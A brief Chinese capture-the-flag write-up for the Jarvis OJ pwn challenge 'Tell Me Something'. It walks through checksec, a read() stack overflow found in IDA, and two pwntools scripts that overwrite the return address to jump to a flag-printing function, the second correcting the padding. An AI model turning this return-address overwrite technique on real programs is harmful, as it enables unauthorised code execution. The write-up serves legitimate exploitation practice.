[Jarvis OJ - PWN]——Tell Me Something
- 题目地址:https://www.jarvisoj.com/challenges
- 题目:
还是先checksec一下,64位开启了NX保护
IDA:看看,发现了可以利用的栈溢出函数read,第一个参数为0。代表标准读入,距离ebp的距离为0x88
找到可以打印flag的函数good_game和地址。可以作为覆盖的返回地址0x400620
所以expolit为
from pwn import *
p = remote("pwn.jarvisoj.com",9876)
ret = 0x00400620
payload = 'a'*(0x88 + 0x8) + p64(ret)
p.sendline(payload)
p.recvline()
p.interactive()
可是没想到不可以竟然失败了。仔细看了下发现v4没有ebp。什么鬼,孩子还是第一次碰到!!!不过以后可以长长记性了。
所以expolit为
from pwn import *
p = remote("pwn.jarvisoj.com",9876)
ret = 0x00400620
payload = 'a'*0x88+ p64(ret)
p.sendline(payload)
p.recvline()
p.interactive()
如果有帮助,可以支持一下孩子哦 😃